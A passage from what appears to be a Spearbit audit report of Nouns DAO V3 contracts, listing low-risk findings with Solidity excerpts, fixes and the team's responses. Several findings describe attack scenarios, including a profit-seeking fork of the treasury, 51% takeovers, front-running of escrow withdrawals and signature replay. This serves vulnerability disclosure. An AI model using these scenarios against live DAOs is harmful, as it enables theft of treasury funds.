Nouns: Followed Spearbit's recommendation and fixed the issue in PR 711.

Spearbit: Acknowledged.

5.3 Low Risk

+5.3.1 Attacker can utilize bear market conditions to profit from forking the Nouns DAO

Severity: Low Risk

Context: NounsDAOV3Fork.sol#L212-L231

Description: An economic attack vector has been identified that could potentially compromise the integrity of the Nouns DAO treasury, specifically due to the introduction of forking functionality. Currently, the treasury holds approximately $24,745,610.99 in ETH and about $27,600,000 in stETH. There are roughly 738 nouns tokens. As per OpenSea listings, the cheapest nouns token can be purchased for about 31 ETH, approximately $53,000. Meanwhile, the daily auction price for the nouns stands at approximately 28 ETH, which equals about $48,600.
A prospective attacker may exploit the current bear market conditions, marked by discounted prices, to buy multiple nouns tokens at a low price, execute a fork to create a new DAO and subsequently claim a portion of the treasury. This act would result in the attacker gaining more than they invested, at the expense of the Nouns DAO treasury. To illustrate, if the forking threshold is established at 20%, an attacker would need 148 nouns to execute a fork. Consider the scenario where a user purchases 148 nouns for a total of 4588 ETH (148 x 31 ether). The forkTreasury.balance would be 2679.27 ETH, and stETH.balanceOf(forkTreasury) would stand at 3000.7 ETH. The total ETH obtained would amount to 5680.01 ETH, thereby yielding a profit of 1092 ETH ($2,024,568).

Recommendation: Consider updating the original DAO auction house reserve price and evaluating market-controlling initiatives, say nouns buybacks with treasury funds and their subsequent burning (given low market prices this would be a profit-generating activity in terms of nouns valuation).

Nouns: We are aware of the incentives the fork mechanism creates. For now we will not introduce any more changes, but this is a topic that will continue to be discussed.

Spearbit: Acknowledged.

+5.3.2 Setting NounsAuctionHouse's timeBuffer too big is possible, which will freeze bidder's funds

Severity: Low Risk

Context: NounsAuctionHouse.sol#L161-L169

Description: It is currently possible to set timeBuffer to an arbitrarily big value with setTimeBuffer(); there is no upper bound:

• NounsAuctionHouse.sol#L161-L169

/**
 * @notice Set the auction time buffer.
 * @dev Only callable by the owner.
 */
function setTimeBuffer(uint256 _timeBuffer) external override onlyOwner {
    timeBuffer = _timeBuffer;

    emit AuctionTimeBufferUpdated(_timeBuffer);
}

This can freeze user funds, as NounsAuctionHouse holds the current bid, but its release is conditional on block.timestamp >= _auction.endTime:

• NounsAuctionHouse.sol#L96-L98

function settleAuction() external override whenPaused nonReentrant {
    _settleAuction();
}

• NounsAuctionHouse.sol#L221-L234

function _settleAuction() internal {
    INounsAuctionHouse.Auction memory _auction = auction;

    require(_auction.startTime != 0, "Auction hasn't begun");
    require(!_auction.settled, 'Auction has already been settled');
    require(block.timestamp >= _auction.endTime, "Auction hasn't completed");

>>  auction.settled = true;

    if (_auction.bidder == address(0)) {
        nouns.burn(_auction.nounId);
    } else {
        nouns.transferFrom(address(this), _auction.bidder, _auction.nounId);
    }

And _auction.endTime is extended by timeBuffer, which can be set to an arbitrarily big value, say 10^6 years, effectively freezing the current bidder's funds:

• NounsAuctionHouse.sol#L104-L129

function createBid(uint256 nounId) external payable override nonReentrant {
    ...

    // Extend the auction if the bid was received within `timeBuffer` of the auction end time
    bool extended = _auction.endTime - block.timestamp < timeBuffer;
    if (extended) {
>>      auction.endTime = _auction.endTime = block.timestamp + timeBuffer;
    }

I.e. the permissionless settleAuction() mechanics will be disabled, and the current bidder's funds will be frozen for an arbitrary time. As the new setting needs to pass voting, the probability is very low. At the same time it is higher for any forked DAO than for the original one, so, while the issue is present in V1 and V2, it becomes more severe in V3 in the context of the forked DAO. The impact is high, being a long-term freeze of the bidder's native tokens.

Recommendation: Consider introducing an upper limit for timeBuffer, say 1 day.
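A minimal sketch of such a cap (not from the report; the MAX_TIME_BUFFER constant and the revert string are assumptions, the rest mirrors the setter shown above):

// Hypothetical hardening sketch for NounsAuctionHouse.setTimeBuffer().
uint256 public constant MAX_TIME_BUFFER = 1 days; // assumed bound, per the 1 day suggestion

function setTimeBuffer(uint256 _timeBuffer) external override onlyOwner {
    // Reject values that could push auction.endTime arbitrarily far into the future
    require(_timeBuffer <= MAX_TIME_BUFFER, 'NounsAuctionHouse: timeBuffer too large');
    timeBuffer = _timeBuffer;

    emit AuctionTimeBufferUpdated(_timeBuffer);
}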
Nouns: At this point, due to this requiring going through a DAO proposal, we'll leave it at won't fix.

Spearbit: Acknowledged.

+5.3.3 Veto renouncing in the original DAO or rage quit blocking in a forked DAO as a result of any future proposals will open up the way for 51% attacks

Severity: Low Risk

Context: NounsDAOLogicV2.sol#L900-L915, NounsDAOV3Admin.sol#L318-L333, NounsDAOLogicV1Fork.sol#L195-L222

Description: It is possible to renounce veto power in the V1, V2 and V3 versions of the protocol, or to upgrade a forked V1 to block or remove rage quit. While these are a part of the standard workflow, the operations are irreversible and open up the possibility of all variations of a 51% attack. As a simplest example, in the absence of veto functionality a majority can introduce and execute a proposal to move all DAO treasury funds to an address they control. Also, there is a related vector: incentivized bad faith voting.

_burnVetoPower() exists in V1, V2 and V3.

In NounsDAOLogicV1:

/**
 * @notice Burns veto priviledges
 * @dev Vetoer function destroying veto power forever
 */
function _burnVetoPower() public {
    // Check caller is pendingAdmin and pendingAdmin ≠ address(0)
    require(msg.sender == vetoer, 'NounsDAO::_burnVetoPower: vetoer only');

    _setVetoer(address(0));
}

In NounsDAOLogicV2:

/**
 * @notice Burns veto priviledges
 * @dev Vetoer function destroying veto power forever
 */
function _burnVetoPower() public {
    // Check caller is vetoer
    require(msg.sender == vetoer, 'NounsDAO::_burnVetoPower: vetoer only');

    // Update vetoer to 0x0
    emit NewVetoer(vetoer, address(0));
    vetoer = address(0);

    // Clear the pending value
    emit NewPendingVetoer(pendingVetoer, address(0));
    pendingVetoer = address(0);
}

In NounsDAOLogicV3:

/**
 * @notice Burns veto priviledges
 * @dev Vetoer function destroying veto power forever
 */
function _burnVetoPower(NounsDAOStorageV3.StorageV3 storage ds) public {
    // Check caller is vetoer
    require(msg.sender == ds.vetoer, 'NounsDAO::_burnVetoPower: vetoer only');

    // Update vetoer to 0x0
    emit NewVetoer(ds.vetoer, address(0));
    ds.vetoer = address(0);

    // Clear the pending value
    emit NewPendingVetoer(ds.pendingVetoer, address(0));
    ds.pendingVetoer = address(0);
}

Also, veto() was removed from NounsDAOLogicV1Fork, and the only mitigation to the same attack is rage quit():

• NounsDAOLogicV1Fork.sol#L195-L222

/**
 * @notice A function that allows token holders to quit the DAO, taking their pro rata funds,
 * and sending their tokens to the DAO treasury.
 * Will revert as long as not all tokens were claimed, and as long as the delayed governance has not expired.
 * @param tokenIds The token ids to quit with
 */
function quit(uint256[] calldata tokenIds) external nonReentrant {
    checkGovernanceActive();

    uint256 totalSupply = adjustedTotalSupply();

    for (uint256 i = 0; i < tokenIds.length; i++) {
        nouns.transferFrom(msg.sender, address(timelock), tokenIds[i]);
    }

    for (uint256 i = 0; i < erc20TokensToIncludeInQuit.length; i++) {
        IERC20 erc20token = IERC20(erc20TokensToIncludeInQuit[i]);
        uint256 tokensToSend = (erc20token.balanceOf(address(timelock)) * tokenIds.length) / totalSupply;
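        // Pro rata share: treasury balance scaled by the quitting token count over the
        // adjusted total supply. Integer division rounds down, so any remainder (dust)
        // stays in the treasury.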
        bool erc20Sent = timelock.sendERC20(msg.sender, address(erc20token), tokensToSend);
        if (!erc20Sent) revert QuitERC20TransferFailed();
    }

    uint256 ethToSend = (address(timelock).balance * tokenIds.length) / totalSupply;
    bool ethSent = timelock.sendETH(msg.sender, ethToSend);
    if (!ethSent) revert QuitETHTransferFailed();

    emit Quit(msg.sender, tokenIds);
}

This means that any malfunction in this function (as an example, if USDC is added to erc20TokensToIncludeInQuit while a minority of forked nouns holders was previously black-listed by the USDC contract) will open up the possibility of a majority attack on them, i.e. there will be no way to stop a majority-backed malicious proposal from affecting the DAO-held funds of such holders.

Nouns holders that aren't aware enough of the importance of a functioning veto() for the original DAO and quit() for the forked DAO can pass a proposal that renounces veto or [fully or partially] blocks quit(), enabling the 51% attack. Such a change is irreversible, and if a majority forms and acts before any similar mitigation functionality can be reinstated, the whole DAO funds of the rest of the holders can be lost. Per very low likelihood (which increases with the switch from veto() to quit() as a safeguard) and high funds-loss impact, setting the severity to be low.

Recommendation: The key mitigation here is educating the holders on the roles of these two functions. The surface will not exist as long as most of the holders are aware of the possibility of the attack and of these guards being in place, and reject any proposal affecting them. Consider highlighting _burnVetoPower()'s effect of opening a 51% attack vector for the original DAO, and emphasizing the availability of the forked DAO's quit() as the only safeguard in place against the same vector. Note that, in the absence of veto() in the forked DAO, a wider range of possible changes has the potential to create this vector (not only quit() removal, but quit() blocking for any reason).

Nouns: The DAO members are well aware of the risk of 51% attack and the importance of veto and fork/quit options. We will make sure this stays in awareness of all members.

Spearbit: Acknowledged.

+5.3.4 The try-catch block at NounsAuctionHouseFork will only catch errors that contain strings

Severity: Low Risk

Context: NounsAuctionHouseFork.sol#L213-L229

Description: This issue has been previously identified and documented in the Nouns Builder Code4rena Audit. The catch Error(string memory) within the try/catch block in the _createAuction function only catches reverts that include strings. At present, in the current version of the NounsAuctionHouseFork there are no reverts without a string. But, given the fact that the NounsAuctionHouseFork and the NounsTokenFork contracts are meant to be upgradable, if a future upgrade of NounsTokenFork:mint() replaces the require statements with custom errors, the existing catch statement won't be able to handle the reverts, potentially leading to a faulty state of the contract.
Here's an example illustrating that the catch Error(string memory) won't catch reverts with custom errors that don't contain strings:

contract Test1 {
    bool public error;
    Test2 test;

    constructor() {
        test = new Test2();
    }

    function testCustomErr() public {
        try test.revertWithRevert() {} catch Error(string memory) {
            error = true;
        }
    }

    function testRequire() public {
        try test.revertWithRequire() {} catch Error(string memory) {
            error = true;
        }
    }
}

contract Test2 {
    error Revert();

    function revertWithRevert() public {
        revert Revert();
    }

    function revertWithRequire() public {
        require(true == false, "a");
    }
}

Recommendation: If the NounsTokenFork:mint() method of the NounsTokenFork changes to include custom errors as the revert reason, it is recommended to modify the catch Error(string memory) clause to also catch errors that don't contain strings. However, it is not advisable to change catch Error(string memory) to a bare catch, as this modification could unintentionally capture unwanted reverts, such as those due to an out-of-gas condition.

Nouns: We will take this into consideration if the errors change from strings to custom errors. For now, we won't fix.

Spearbit: Acknowledged.

+5.3.5 Private keys are read from the .env environment variable in the deployment scripts

Severity: Low Risk

Context: DeployDAOV3NewContractsBase.s.sol#L53, DeployDAOV3DataContractsBase.s.sol#L21, ProposeENSReverseLookupConfigMainnet.s.sol#L18, ProposeDAOV3UpgradeTestnet.s.sol#L32, ProposeDAOV3UpgradeMainnet.s.sol#L24, ProposeTimelockMigrationCleanupMainnet.s.sol#L22

Description: It has been identified that the private keys of privileged accounts (PROPOSER_KEY and DEPLOYER_PRIVATE_KEY) are read from environment variables within the deployment scripts. The deployer address is verified on Etherscan as Nouns DAO: Deployer. Additionally, since the proposal is made by the account that owns the PROPOSER_KEY, it can be assumed that the proposer owns at least some Nouns.

Given the privileged status of the deployer and the proposer, unauthorized access to these private keys could have a negative impact on the reputation of the Nouns DAO. The present method of managing private keys, i.e. through environment variables, represents a potential security risk. This is due to the fact that any program or script with access to the process environment can read these variables. As mentioned in the Foundry documentation:

This loads in the private key from our .env file. Note: you must be careful when exposing private keys in a .env file and loading them into programs. This is only recommended for use with non-privileged deployers or for local / test setups. For production setups please review the various wallet options that Foundry supports.

Recommendation: Consider employing alternative methods to load the private keys in the deployment scripts. Some alternatives as suggested in the ETHSecurity channel include:

1. AWS Secrets Manager
2. AWS CloudHSM
3. AWS KMS External Key Store (XKS)
4. AWS Nitro Enclaves

Nouns: The PROPOSER_KEY doesn't need to necessarily own Nouns, it can be delegated some voting power. In any case, we will consider changing this, but for now, won't fix.

Spearbit: Acknowledged.

+5.3.6 Objection period will be disabled after the update to V3 is completed

Severity: Low Risk

Context: ProposeDAOV3UpgradeMainnet.s.sol, ProposeTimelockMigrationCleanupMainnet.s.sol

Description: Nouns DAO V3 introduces a new functionality called the objection-only period.
This is a conditional voting period that gets activated upon a last-minute proposal swing from defeated to successful, affording against-voters more reaction time. Only against votes will be possible during the objection period.

After the proposals created in ProposeDAOV3UpgradeMainnet.s.sol and ProposeTimelockMigrationCleanupMainnet.s.sol are executed, lastMinuteWindowInBlocks and objectionPeriodDurationInBlocks will still remain set to 0. A new proposal will have to be created, passed and executed in the DAO that calls the _setLastMinuteWindowInBlocks() and _setObjectionPeriodDurationInBlocks() functions to enable this functionality.

Recommendation: Consider adding to the ProposeTimelockMigrationCleanupMainnet.s.sol's proposal 2 new transactions that call and set _setLastMinuteWindowInBlocks() and _setObjectionPeriodDurationInBlocks().

Nouns: This was done intentionally as we want the upgrade to start with this feature turned off. We want the DAO to vote separately on the parameters they want to turn it on with. Won't fix.

Spearbit: Acknowledged.

+5.3.7 Potential risks from outdated OpenZeppelin dependencies in the Nouns DAO v3

Severity: Low Risk

Context: yarn.lock#L4191-L4192, yarn.lock#L4196-L4197

Description: The OpenZeppelin libraries are used throughout the Nouns DAO v3 codebase. These libraries, however, are locked at version 4.4.0, which is an outdated version that has some known vulnerabilities. Specifically:

• The SignatureChecker.isValidSignatureNow is not expected to revert. However, an incorrect assumption about Solidity 0.8's abi.decode allows some cases to revert, given a target contract that doesn't implement EIP-1271 as expected. The contracts that may be affected are those that use SignatureChecker to check the validity of a signature and handle invalid signatures in a way other than reverting.

• The ERC165Checker.supportsInterface is designed to always successfully return a boolean, and under no circumstance revert. However, an incorrect assumption about Solidity 0.8's abi.decode allows some cases to revert, given a target contract that doesn't implement EIP-165 as expected, specifically if it returns a value other than 0 or 1. The contracts that may be affected are those that use ERC165Checker to check for support for an interface and then handle the lack of support in a way other than reverting.

At present, these vulnerabilities do not appear to have an impact on the Nouns DAO codebase, as the corresponding functions revert upon failure. Nevertheless, these vulnerabilities could potentially impact future versions of the codebase.

Recommendation: As a security measure, it is advisable to update the version of the OpenZeppelin libraries in both the yarn.lock and the package.json files.

Nouns: We will consider it for the future. For now, we won't fix.

Spearbit: Acknowledged.

+5.3.8 DAO withdraws forked ids from escrow without emphasizing total supply increase, which contradicts the spec and can catch holders unaware

Severity: Low Risk

Context: NounsDAOV3Fork.sol#L160-L178

Description: Withdrawal of original nouns with ids of the forked tokens from escrow after a successful fork is a material event for all original nouns holders, as the adjusted total supply is increased as long as the withdrawal recipient is not the treasury. There were special considerations regarding Nouns withdrawal impact after the fork:

For this reason we're considering a change to make sure transfers go through a new function that helps Nouners understand the implication, e.g.
by setting the function name to withdrawNounsAndGrowTotalSupply or something similar, as well as emitting events that indicate the new (and greater) total supply used by the DAO.

However, currently withdrawDAONounsFromEscrow() neither has a special name nor mentions the increase of the adjusted total supply when to != ds.timelock:

• NounsDAOV3Fork.sol#L160-L178

/**
 * @notice Withdraws nouns from the fork escrow after the fork has been executed
 * @dev Only the DAO can call this function
 * @param tokenIds the tokenIds to withdraw
 * @param to the address to send the nouns to
 */
function withdrawDAONounsFromEscrow(
    NounsDAOStorageV3.StorageV3 storage ds,
    uint256[] calldata tokenIds,
    address to
) external {
    if (msg.sender != ds.admin) {
        revert AdminOnly();
    }

    ds.forkEscrow.withdrawTokens(tokenIds, to);

    emit DAOWithdrawNounsFromEscrow(tokenIds, to);
}

A Nouns holder might not understand the consequences of withdrawing the nouns from escrow and support such a proposal, while as of now it is approximately a USD 65k loss per withdrawn noun, cumulatively, for current holders. The vulnerability scenario here is a holder supporting the proposal without understanding the consequences for the supply, as no emphasis is made, and then suffering their share of the loss as a result of its execution. Per low likelihood and impact, setting the severity to be low.

Recommendation: Consider emitting a special event when to != timelock, for example:

if (to != address(ds.timelock)) {
    emit DAONounsSupplyIncreasedFromEscrow(tokenIds.length, to);
}

In order to emphasize the supply increase, consider splitting withdrawDAONounsFromEscrow() into 2 functions:

• First, for example, withdrawDAONounsFromEscrowToTreasury, having no to argument and performing ds.forkEscrow.withdrawTokens(tokenIds, address(ds.timelock)).

• Second, for example, withdrawDAONounsFromEscrowIncreasingTotalSupply, requiring to != address(ds.timelock), performing ds.forkEscrow.withdrawTokens(tokenIds, to) and emitting DAONounsSupplyIncreasedFromEscrow.

Nouns: Fix: nounsDAO/nouns-monorepo#735.

Spearbit: Fix looks good.

+5.3.9 USDC-paying proposals executing between ProposeDAOV3UpgradeMainnet and ProposeTimelockMigrationCleanupMainnet will fail

Severity: Low Risk

Context: Known-Issues, ProposeDAOV3UpgradeMainnet.s.sol#L106-L116

Description: As explained in one of the Known Issues, ProposeDAOV3UpgradeMainnet contains a proposal that transfers the ownership of PAYER_MAINNET and TOKEN_BUYER_MAINNET from timelockV1 to timelockV2. There could be older USDC-paying proposals executing after ProposeDAOV3UpgradeMainnet which assume timelockV1 ownership of these contracts. Older USDC-paying proposals executing after ProposeDAOV3UpgradeMainnet will fail.

Recommendation: While the proposed mitigation is: "Our mitigation to this issue will be communication with the DAO ahead of time, and should we see any proposals in this state, we will contact their proposers immediately and help them re-propose.", the number of affected proposals could be reduced if the ownership transfers of PAYER_MAINNET and TOKEN_BUYER_MAINNET are moved from ProposeDAOV3UpgradeMainnet to ProposeTimelockMigrationCleanupMainnet, which will at least prevent the older proposals executing between these two proposals from failing due to this reason.

Nouns: Fixed: nounsDAO/nouns-monorepo#734.

Spearbit: Verified that PR 734 fixes the issue as recommended.
+5.3.10 Zero value ERC-20 transfers can be performed on sending treasury funds to a quitting member or forked DAO, denying the whole operation if one of the erc20TokensToIncludeInQuit tokens doesn't allow this

Severity: Low Risk

Context: NounsDAOLogicV1Fork.sol#L210-L215, NounsDAOV3Fork.sol#L225-L230

Description: Some tokens do not allow zero value transfers. Such behaviour does not violate the ERC-20 standard, is not in any way prohibited, and can occur in any non-malicious token. As a somewhat well-known example, Aave's LEND requires the amount to be positive:

• etherscan.io/address/0x80fb784b7ed66730e8b1dbd9820afd29931aab03#code#L74

function transfer(address _to, uint256 _value) returns(bool) {
    require(balances[msg.sender] >= _value);
    require(balances[_to] + _value > balances[_to]);

As stETH, which is currently used by the Nouns treasury, is upgradable, it cannot be ruled out that it might require the same in the future for any reason.

• etherscan.io/token/0xae7ab96520de3a18e5e111b5eaab095312d7fe84#code

A zero value itself can occur in a situation when a valid token was added to erc20TokensToIncludeInFork, but this token's timelock balance is currently empty. NounsDAOLogicV1Fork's quit() and NounsDAOV3Fork's executeFork() and joinFork() will be unavailable in such a scenario, i.e. the DAO forking workflow will be disabled.

Since the update of erc20TokensToIncludeInFork goes through proposal mechanics and major tokens rarely upgrade, while there is an additional requirement of an empty balance, the cumulative probability of the scenario can be deemed quite low, while the core-functionality-blocking impact is high, so setting the severity to be low.

Recommendation: Consider checking that the amount is positive in both cases, for example:

NounsDAOLogicV1Fork's quit():

  for (uint256 i = 0; i < erc20TokensToIncludeInQuit.length; i++) {
      IERC20 erc20token = IERC20(erc20TokensToIncludeInQuit[i]);
      uint256 tokensToSend = (erc20token.balanceOf(address(timelock)) * tokenIds.length) / totalSupply;
+     if (tokensToSend > 0) {
          bool erc20Sent = timelock.sendERC20(msg.sender, address(erc20token), tokensToSend);
          if (!erc20Sent) revert QuitERC20TransferFailed();
+     }
  }

The NounsDAOV3Fork:sendProRataTreasury(), which is called during the executeFork() & joinFork() functions:

  for (uint256 i = 0; i < erc20Count; ++i) {
      IERC20 erc20token = IERC20(ds.erc20TokensToIncludeInFork[i]);
      uint256 tokensToSend = (erc20token.balanceOf(address(timelock)) * tokenCount) / totalSupply;
+     if (tokensToSend > 0) {
          bool erc20Sent = timelock.sendERC20(newDAOTreasury, address(erc20token), tokensToSend);
          if (!erc20Sent) revert ERC20TransferFailed();
+     }
  }

The motivation for the suggestion is also gas optimization: while DAO transfers happen once per fork, in the NounsDAOLogicV1Fork quit() case every quitting member would pay for such an empty transfer, and its gas costs are substantial enough.

Nouns: Acknowledged. Fix PR here: nounsDAO/nouns-monorepo#727.

Spearbit: Fixed as recommended.

+5.3.11 A signer of multiple proposals will cause all of them except one to fail creation

Severity: Low Risk

Context: NounsDAOV3Proposals.sol#L787-L798, NounsDAOV3Proposals.sol#L818

Description: Like proposers, signers are also allowed to back only one proposal at a time. As commented: "This is a spam protection mechanism to limit the number of proposals each noun can back." However, unlike proposers, who know which of their proposals are active and when, signers may not readily have that insight and can sign multiple proposals they may want to back.
If more than one such proposal is proposed, then only the first one will pass the checkNoActiveProp() check for this signer, and all the others will fail this check and thereby the proposal creation itself. A signer of multiple proposals will cause all of them except one to fail creation. Other proposals will then have to exclude such signatures and be resubmitted. This could be accidental or used by malicious signers for griefing proposal creations.

Recommendation: Instead of reverting in checkNoActiveProp() when proposal signers already have an active proposal, have it return a boolean to help skip such signers from consideration in its callers. Not all signers included in proposeBySigs() have to necessarily be part of the proposal when created. propose() can choose to revert if checkNoActiveProp() returns false.

Nouns: Thanks for reporting. We agree this can improve UX a bit, but we think the clients should be able to identify signers with an active proposal. Won't fix.

Spearbit: Acknowledged.

+5.3.12 Single-step ownership change is risky

Severity: Low Risk

Context: NounsAuctionHouseFork.sol#L34, NounsTokenFork.sol#L20

Description: The codebase primarily follows a two-step ownership change pattern. However, in specific sections, a single-step ownership change is utilized. A two-step ownership change is preferable, where:

• The current owner proposes a new address for the ownership change.
• In a separate transaction, the proposed new address can then claim the ownership.

Recommendation: Consider implementing a two-step ownership transfer process throughout the codebase, similar to the approach used in Ownable2StepUpgradeable.

Nouns: Since these ownership changes would have to go through a proposal process, this seems very low risk. We won't introduce a fix for this one.

Spearbit: Acknowledged.

+5.3.13 No storage gaps for upgradeable contracts might lead to storage slot collision

Severity: Low Risk

Context: NounsDAOExecutorV2.sol#L46, NounsAuctionHouseFork.sol#L41, NounsDAOLogicV1Fork.sol#L105, NounsTokenFork.sol#L39

Description: When implementing upgradeable contracts that inherit, it is important that there are storage gaps, in case new storage variables are later added to the inherited contracts. If a storage gap variable isn't added, when the upgradeable contract introduces new variables, it may override the variables in the inheriting contract. As noted in the OpenZeppelin documentation:

You may notice that every contract includes a state variable named __gap. This is empty reserved space in storage that is put in place in Upgrade Safe contracts. It allows us to freely add new state variables in the future without compromising the storage compatibility with existing deployments. It isn't safe to simply add a state variable because it "shifts down" all of the state variables below in the inheritance chain.

Recommendation: To ensure the stability of future storage layout changes to the base contract, it is recommended to add a __gap variable as the last storage variable in these upgradeable contracts, resulting in a fixed total number (50 for example) of storage slots. Please note that as subsequent versions include additional storage variables, the __gap variable space will need to be adjusted accordingly to maintain the fixed number of slots.

Nouns: IIUC a storage gap is only helpful if the contract which has a storage gap is itself being inherited. The contracts you mentioned, NounsDAOExecutorV2, NounsAuctionHouseFork, NounsDAOLogicV1Fork and NounsTokenFork, are not being inherited.
Unless there's a larger reason, won't fix.

Spearbit: Acknowledged.

+5.3.14 The version string is missing from the domain separator, allowing submission of signatures in different protocol versions

Severity: Low Risk

Context: NounsDAOV3Votes.sol#L164-L167, NounsDAOV3Proposals.sol#L981-L983, NounsDAOLogicV1Fork.sol#L560-L562, ERC721CheckpointableUpgradeable.sol#L146

Description: The version string seems to be missing from the domain separator. According to EIP-712:

Protocol designers only need to include the fields that make sense for their signing domain. Unused fields are left out of the struct type.

While it's not a mandatory field as per the EIP-712 standard, it would be sensible for the protocol to include the version string in the domain separator, considering that the contracts are upgradable. For instance, if a user generates a signature for version v1.0, they may not want the signature to remain valid following an upgrade.

Recommendation: It is recommended to also include the version string in the domain separator.

Nouns: Due to very low risk and the non-trivial fix required, we will not fix this for now.

Spearbit: Acknowledged.

+5.3.15 Two/three forks in a row will force expiration of execution-awaiting proposals

Severity: Low Risk

Context: ProposeDAOV3UpgradeMainnet.s.sol#L15, NounsDAOV3Admin.sol#L133, NounsDAOExecutorV2.sol#L80

Description: Proposal execution on the original DAO is disallowed during the forking period. While the proposed fork period is currently 7 days, MAX_FORK_PERIOD is 14 days. GRACE_PERIOD, which is the time allowed for a queued proposal to execute, has been increased from the existing 14 days to 21 days specifically to account for the fork period. However, if there are three consecutive forks whose active fork periods add up to 21 days, or two forks in the worst case if the fork period is set to MAX_FORK_PERIOD, then all queued proposals will expire and cannot be executed. Malicious griefing forkers can collude to time and break up their voting power to fork consecutively to prevent execution of queued proposals on the original DAO, thus forcing them to expire.

Recommendation: Consider introducing a short delay, e.g. 2-3 days, between the end of a fork and the start of the next one. This will allow execution of queued proposals during this fork delay period without forcing their expiration.

Nouns: In order to perform such a griefing attack, given a threshold of 20% to fork, the attacker would need to have 36% (20% + 16%) of nouns to do 2 forks in a row, or 48% to do 3 forks in a row. This seems highly unlikely, therefore we won't be implementing a fix for this.

Spearbit: Acknowledged.

+5.3.16 Withdrawing from fork escrow can be front-run to prevent withdrawal and force joining the fork

Severity: Low Risk

Context: NounsDAOV3Fork.sol#L93C74-L100, NounsDAOV3Fork.sol#L109-L130

Description: withdrawFromForkEscrow() is meant to allow a fork-escrowed holder to change their mind about joining the fork by withdrawing their escrowed tokens. However, the current design allows another fork-joining holder to front-run a withdrawFromForkEscrow() transaction with their escrowToFork() to exceed the fork threshold and also call executeFork() with it (if the threshold was already met then this doesn't even have to be another fork-joining holder). This will cause withdrawFromForkEscrow() to fail because the fork period is now active, and that holder is forced to join the fork with their previously escrowed tokens.
Scenario: Alice and Bob decide to create/join a fork with their 10 & 15 tokens respectively to meet the 20% fork threshold (assume 100 Nouns). Alice escrows first but then changes her mind and calls withdrawFromForkEscrow(). Bob observes this transaction (assume no private mempool) and front-runs it with his escrowToFork() + executeFork(). This forces Alice to join the fork instead of staying back.

withdrawFromForkEscrow() does not always succeed and is likely effective only in the early stages of the escrow period, but not towards the end when the fork threshold is almost met. Late fork escrowers do not have as much of an opportunity as others to change their mind about joining the fork.

Recommendation: Front-running is always possible in such protocols and the standard mitigation is to use MEV protections for sensitive actions. Consider a fork execution delay of 1-2 days which is enforced after reaching the threshold but before executing the fork, so that escrowed participants can evaluate their decision to join the fork one last time.

Nouns: We don't think this is an issue. Escrowing your Noun to fork comes with the knowledge that it may fork. We don't need a "risk free" escrowing. Won't fix.

Spearbit: Acknowledged.

+5.3.17 A malicious proposer can replay signatures to create duplicate proposals

Severity: Low Risk

Context: NounsDAOV3Proposals.sol#L844-L851

Description: Suppose Bob and Alice sign a proposal for Carl, authorizing a transfer of exactly 100,000 USDC to a specified address (xyz), and their signatures were created with a long expiration time. Following the normal procedure, Carl creates the proposal, the vote is held, and the proposal enters the 'succeeded' state. However, since Bob and Alice's signatures are still valid due to the long expiration time, Carl could reuse these signatures to create another proposal for an additional transfer of 100,000 USDC to the same xyz address, as long as Bob and Alice still retain their voting power/nouns. Thus, Carl could double the intended transfer amount without their explicit authorization.

While it is true that Bob and Alice can intervene by either cancelling the new proposal or invalidating their signatures before the creation of the second proposal, this requires them to take action, which may not always be feasible or timely.

Recommendation: Consider adding a nonce as part of these signatures and invalidating the nonce once it is used.

Nouns: Adding a nonce system is too big of a change. We consider this issue to be very low risk, hence won't fix.

Spearbit: Acknowledged.

+5.3.18 Potential re-minting of previously burnt NounsTokenFork

Severity: Low Risk

Context: NounsTokenFork.sol#L142-L157, NounsDAOForkEscrow.sol#L168-L176

Description: In the current implementation of the NounsTokenFork contract, there is a potential vulnerability that allows a previously burned NounsTokenFork to be re-minted. This risk occurs because the user retains the status of escrow.ownerOfEscrowedToken(forkId, nounId) even after the claimFromEscrow() function call. Presently, no tokens are burned outside of the NounsAuctionHouseFork, and tokens are only burned in the case that no bids are placed for that nounId. However, this issue could become exploitable under the following circumstances:

1. If a new burn() functionality is added elsewhere in the code.
2. If a new contract is granted the Minter role.
3. If the NounsAuctionHouseFork is updated to a malicious implementation.
Additionally, exploiting this potential issue would lead to the remainingTokensToClaim variable decreasing, causing it to underflow (<0). In this situation, some legitimate users would be unable to claim their tokens due to this underflow.

Recommendation: Consider updating the escrowedTokensByForkId[forkId_][tokenId] mapping in the NounsDAOForkEscrow contract every time claimFromEscrow() is called.

Nouns: Since there is currently no way to get the Noun burned without changing minter/contracts, we choose not to introduce new logic for fixing this. If the forked DAO chooses to enable burning, they could update the token contract and change the claimFromEscrow() logic.

Spearbit: Acknowledged.

+5.3.19 A single invalid/expired/cancelled signature will prevent the creation and updating of proposals

Severity: Low Risk

Context: NounsDAOV3Proposals.sol#L401, NounsDAOV3Proposals.sol#L815, NounsDAOV3Proposals.sol#L956-L962

Description: For proposals created via proposeBySigs() or updated via updateProposalBySigs(), if the proposer includes even a single invalid/expired/cancelled signature (without performing offchain checks to prevent this scenario), verifyProposalSignature() will revert and the creation/updating of proposals will fail.

A proposer accidentally including one or more invalid/expired/cancelled signatures submitted by a signer will cause the proposal creation/updating to fail, lose the gas used, and will have to resubmit after checking and excluding such signatures. This also allows griefing by signers who intentionally submit an invalid/expired signature, or a valid one which is later cancelled (using cancelSig()) just before the proposal is created/updated. Note that while the signers currently have cancellation powers which give them a greater griefing opportunity even at later proposal states, that has been reported separately in a different issue.

Recommendation:

1. Consider having verifyProposalSignature() return a status code (invalid/expired/cancelled) which is then used to skip the consideration of such signatures. The voting power of the other signatures may still add up to being sufficient for the proposal to be created or updated.

2. Consider checking that the voting power of valid signatures during an update exceeds the threshold, instead of requiring the exact ordered list of original signers. The update's signers may be a subset of the original signers but still pass the proposal threshold to indicate support for the update.

Nouns: Acknowledged, but due to low risk, won't fix.

Spearbit: Acknowledged.

+5.3.20 Missing require checks in NounsDAOV3Proposals.execute() and executeOnTimelockV1() functions

Severity: Low Risk

Context: NounsDAOV3Proposals.sol#L470, NounsDAOV3Proposals.sol#L481

Description: The following require checks are missing:

• Function NounsDAOV3Proposals.execute():

require(proposal.executeOnTimelockV1 == false, 'NounsDAO::execute: executeOnTimelockV1 = true');

• Function NounsDAOV3Proposals.executeOnTimelockV1():

require(proposal.executeOnTimelockV1 == true, 'NounsDAO::executeOnTimelockV1: executeOnTimelockV1 = false');

Due to the absence of these require checks, the NounsDAOLogicV3 contract leaves open a vulnerability where, if two identical proposals with the exact same transactions are concurrently queued in both the timelockV1 and timelock contracts, the proposal originally intended for execution on timelock can be executed on timelockV1 and vice versa.
